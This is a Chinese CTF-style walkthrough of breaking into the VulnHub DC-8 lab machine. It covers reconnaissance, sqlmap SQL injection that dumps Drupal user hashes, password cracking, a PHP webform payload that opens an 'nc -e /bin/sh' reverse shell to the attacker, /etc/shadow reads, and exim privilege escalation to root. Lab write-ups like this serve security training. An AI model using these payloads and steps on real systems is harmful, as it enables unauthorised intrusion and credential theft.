DC-8：渣渣在靶机渗透时的睿智操作 – 作者:bigsong

靶机下载

网站:https://www.vulnhub.com/

不得不说，本地下载真的慢，种子链接下载好香

在下载页面中找到第三个下载种子链接

打开百度网盘，找到离线下载，点击旁边的小箭头，选择添加BT任务，找到刚下载的种子文件，拖进去

此处会显示开始寻找资源然后自动下载，点击刷新可看到最新的下载情况（好像不会自动刷新，一直显示资源寻找中不要慌，手动刷新下）

靶机—DC-8

环境配置：

使用平台：VMware

网卡模式：NAT模式

所属网段：217

攻击机kali：192.168.217.131

靶机dc8：未知

一、信息获取

1.masscan -p22 192.168.217.0/24 –rate=2000  ———扫描获取217网段下的linux系统的ip

获取到ip：192.168.217.148，目前只开启了kali和dc8，所以推测该ip为dc8的IP地址

2.nmap -sC -sV -p- -n 192.168.217.148 –min-rate=2000 ——-扫描获取靶机端口信息

得到了： 22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)

80/tcp open  http    Apache httpd

3.searchsploit OpenSSH 7.4p1  ———-扫描ssh服务的系统漏洞

都是用户名枚举，没啥可用的

searchsploit Apache httpd  ———-扫描http服务的系统漏洞

都没啥有用的

4..gobuster dir -u 192.168.217.148 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 20——探测目录

探测出很多目录，403无法访问，301资源被永久转移无法访问，只有200可用

5.gobuster dir -u 192.168.217.148 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 20 -s200 —–筛选出了状态200（可访问）的目录

/0 (Status: 200)

/node (Status: 200)

/robots.txt (Status: 200)

/user (Status: 200)

6.访问192.168.217.148查看网站首页

7.访问其余目录

192.168.217.148/0

与首页没什么区别

192.168.217.148/node

内容翻译：尚未创建首页内容

192.168.217.148/user

这是个登陆注册界面，很重要

192.168.217.148/robots.txt

都是文本

二、漏洞挖掘

1.先从首页看起，查看源代码，正经的html编写没啥有用的

2.点点旁边的跳转链接，有了新发现

在导航栏处发现了疑似sql语句的东西，可以试试是否存在sql注入，虽然个人很喜欢直接分析源码，但都看出来了就先试试

输入了’，发现网站报错，sql注入实锤，，最后一行还给出了一条路径，不知道有没有用，先准备尝试爆库

路径：/var/www/html/sites/all/modules/mypages/mypages.module

3.直接在导航栏上输入语句试试

还是报错界面，什么都没有，那抓包看看

4.打开代理，打开burp suite抓包，再打开一次这个界面

发现字符被转义，为了加速实现效果，放弃手工注入，采取sqlmap

5.sqlmap -u “http://192.168.217.148/?nid=1” –dbs ——–获取数据库表名

获取到两个数据库名，显然，d7db是我们要的数据库

6.sqlmap -u “http://192.168.217.148/?nid=1” -D d7db –tables ——获取数据库表名

一共探测出来了88个表，有一张users表，应该包含了登陆信息，继续探测

7.sqlmap -u “http://192.168.217.148/?nid=1” -D d7db -T users –columns——探测表里的列

探测出来了16列，name和pass应该是登录的账号和密码

8.sqlmap -u “http://192.168.217.148/?nid=1” -D d7db -T users  -C name,pass –dump ——获取数据

获取到了两行数据

admin  $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

john    $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

后面是一串加密数据

9.用burp suite解码看看，所有模式都试过了，全都不行，直接上百度

查到是要用john工具破解，用户名的john也是一种提示

Vi john—创建一个名为john的文件

把密码写入文档

John john –show  ——开始对密码解码

只获得了一个数据turtle

打开之前探测到的登录界面尝试

admin      turtle

john        turtle

john        turtle 进入成功，证明了admin密码破解失败

3.进入靶机

看到了ADD content 看到文本框，先输入点什么抓包看看

输入的内容都被转码了，无法直接编写shall脚本

再点点别的，在Contact Us 里找到了可以容纳php的地方

Contact Us–Webform–Form settings

此处输入shell<?php system(“nc -e /bin/sh 192.168.217.131  8888”); ?>保存

在kali上开启监听nc -lvvp 8888

在view中随便输入点内容，kali成功获得shell

whoami       #查看当前用户身份

uname -a     #查看系统信息

history      #查看命令历史，有可能可以查看到管理员的一些重要命令，包括密码等

last         #查看登录历史

cat /etc/passwd  #查看用户

cat /etc/shadow  #查看密码

4.提权

先返回一个稳定的shell

python -c “import pty;pty.spawn(‘/bin/bash’)”

uname -a     #查看内核信息

searchsploit Linux dc-8 4.9.0-4-amd64 —–扫描内核漏洞

想先从内核漏洞提权出来，但是扫描不到结果

利用suid提权试试

find / -perm -u=s -type f 2>/dev/null  —-查看具有root用户权限的文件

不知道哪个有用了，查看百度得知，exim4是个特殊文档那就扫描他的漏洞

根据经验exim4应该是exim的第四代，所以搜索exim的漏洞即可

searchsploit exim

搜出来好多，根据翻译结果，Local Privilege Escalation译为本地权限提升，是我们需要的

选择.sh文件的46996.sh

locate 46996.sh——定位文件

文件位置：/usr/share/exploitdb/exploits/linux/local/46996.sh

靶机中：scp [email protected]:/usr/share/exploitdb/exploits/linux/local/46996.sh /tmp/q.sh —-获取文件

chmod 777 q.sh —-给予权限

bash ./q.sh -m netcat—–提权

失败，字符有问题，百度一下，源文件是doc格式，linux只识别unix，要在kali中修改文件格式再上传

cd /usr/share/exploitdb/exploits/linux/local/

vi 46996.sh

:set ff? # 查询文件格式

:set ff=unix # 将文件格式改成Unix格式

再重做获取文件，权限基于和提权

提权成功

Cd /root

Ls

Cat flag.txt

成功！

来源：freebuf.com 2021-07-14 08:39:02 by: bigsong